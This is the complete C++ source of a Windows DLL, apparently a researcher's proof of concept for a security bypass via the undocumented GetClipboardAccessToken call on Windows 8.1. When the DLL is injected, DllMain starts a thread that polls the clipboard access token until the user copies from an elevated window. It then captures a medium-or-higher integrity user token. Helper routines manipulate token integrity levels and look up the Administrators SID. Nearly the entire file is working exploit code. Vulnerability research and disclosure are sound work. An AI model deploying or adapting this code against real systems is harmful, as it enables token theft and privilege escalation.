// dllmain.cpp : Defines the entry point for the DLL application.
#include "stdafx.h"

// Poc_NtUserGetClipboardAccessToken_SecurityBypass.cpp : Defines the entry point for the console application.
//

#include "stdafx.h"
#include <vector>

void DebugPrintf(LPCSTR lpFormat, ...)
{
	CHAR buf[1024];
	va_list va;

	va_start(va, lpFormat);

	StringCbVPrintfA(buf, sizeof(buf), lpFormat, va);

	OutputDebugStringA(buf);
}

template<class T>
class typed_buffer_ptr {
	std::vector<char> buffer_;

public:
	typed_buffer_ptr() {
	}

	explicit typed_buffer_ptr(size_t size) : buffer_(size) {
	}

	void reset(size_t size) {
		buffer_.resize(size);
	}

	operator T*() {
		return reinterpret_cast<T*>(&buffer_[0]);
	}

	T* operator->() {
		return reinterpret_cast<T*>(&buffer_[0]);
	}

	size_t size() {
		return buffer_.size();
	}
};

BOOL SetTokenIL(HANDLE hToken, DWORD dwIntegrityLevel)
{

	BOOL                  fRet;
	HANDLE                hNewToken = hToken;
	typed_buffer_ptr<SID> il_sid;
	PSID pIntegritySid;
	TOKEN_MANDATORY_LABEL TIL = { 0 };

	// Low integrity SID
	WCHAR wszIntegritySid[32];

	if (FAILED(StringCbPrintf(wszIntegritySid, sizeof(wszIntegritySid), L"S-1-16-%d", dwIntegrityLevel)))
	{
		DebugPrintf("Error creating IL SID\n");
		return FALSE;
	}

	fRet = ConvertStringSidToSid(wszIntegritySid, &pIntegritySid);

	if (!fRet)
	{
		DebugPrintf("Error converting IL string %d\n", GetLastError());
		return FALSE;
	}

	DWORD sidLength = GetLengthSid(pIntegritySid);
	il_sid.reset(sidLength);
	memcpy(il_sid, pIntegritySid, sidLength);
	LocalFree(pIntegritySid);

	TIL.Label.Attributes = SE_GROUP_INTEGRITY;
	TIL.Label.Sid = il_sid;

	fRet = SetTokenInformation(hNewToken,
		TokenIntegrityLevel,
		&TIL,
		sizeof(TOKEN_MANDATORY_LABEL) + il_sid.size());

	if (!fRet)
	{
		DebugPrintf("Error setting IL %d\n", GetLastError());
		return FALSE;
	}


	return TRUE;
}

template <typename T> BOOL GetTokenInfoObject(HANDLE hToken, TOKEN_INFORMATION_CLASS info_class, typed_buffer_ptr<T>& buffer)
{
	DWORD return_length = 0;

	if (!GetTokenInformation(hToken, info_class, nullptr, 0, &return_length))
	{
		if (GetLastError() == ERROR_INSUFFICIENT_BUFFER)
		{
			buffer.reset(return_length);
			return GetTokenInformation(hToken, info_class, buffer, buffer.size(), &return_length);
		}
	}

	return FALSE;
}

HANDLE GetProcessToken()
{
	HANDLE hToken;

	if (OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &hToken))
	{
		return hToken;
	}

	return nullptr;
}

DWORD GetTokenIntegrityLevel(HANDLE hToken)
{
	typed_buffer_ptr<TOKEN_MANDATORY_LABEL> label;

	if (GetTokenInfoObject(hToken, TokenIntegrityLevel, label))
	{
		return *GetSidSubAuthority(label->Label.Sid, 0);
	}

	return 0;
}

DWORD GetUIAccess(HANDLE hToken)
{
	DWORD uia;
	DWORD ret;

	if (GetTokenInformation(hToken, TokenUIAccess, &uia, sizeof(uia), &ret))
	{
		return uia;
	}
	return 0;
}

BOOL GetAdminSid(typed_buffer_ptr<SID>& adminSid)
{
	DWORD return_length = 0;

	if (!CreateWellKnownSid(WinBuiltinAdministratorsSid, nullptr, nullptr, &return_length))
	{
		if (GetLastError() == ERROR_INSUFFICIENT_BUFFER)
		{
			adminSid.reset(return_length);

			return CreateWellKnownSid(WinBuiltinAdministratorsSid, nullptr, adminSid, &return_length);
		}
	}

	return FALSE;
}

typedef int(__stdcall* _GetClipboardAccessToken)(PHANDLE hToken, ACCESS_MASK DesiredAccess);

DWORD CALLBACK DoExploit(LPVOID arg)
{
	_GetClipboardAccessToken f_GetClipboardAccessToken = (_GetClipboardAccessToken)GetProcAddress(LoadLibrary(L"user32.dll"), "GetClipboardAccessToken");
	
	if (f_GetClipboardAccessToken)
	{
		typed_buffer_ptr<SID> adminSid;

		if (!GetAdminSid(adminSid))
		{
			DebugPrintf("Error getting admin sid\n");
		}

		DebugPrintf("Perform a copy in an elevated process window\n");

		while (true)
		{
			HANDLE hToken;

			if (f_GetClipboardAccessToken(&hToken, MAXIMUM_ALLOWED))
			{		
				DWORD il = GetTokenIntegrityLevel(hToken);
				if (il >= SECURITY_MANDATORY_MEDIUM_RID)
				{
					DebugPrintf("Captured token %p with IL of %08X\n", hToken, il);
					MessageBox(nullptr, L"Captured a User Token", L"Message", MB_ICONEXCLAMATION);
					break;
				}									
			
				CloseHandle(hToken);
			}

			Sleep(1000);
		}
	}
	else
	{
		DebugPrintf("GetClipboardAccessToken doesn't exist, not Windows 8.1?\n");
	}	

	//FreeLibraryAndExitThread((HMODULE)arg, 0);
	ExitProcess(1);
}



BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
					 )
{
	DebugPrintf("In DllMain\n");
	switch (ul_reason_for_call)
	{
	case DLL_PROCESS_ATTACH:
		CreateThread(nullptr, 0, DoExploit, hModule, 0, 0);
		break;
	case DLL_THREAD_ATTACH:
	case DLL_THREAD_DETACH:
	case DLL_PROCESS_DETACH:
		break;
	}
	return TRUE;
}

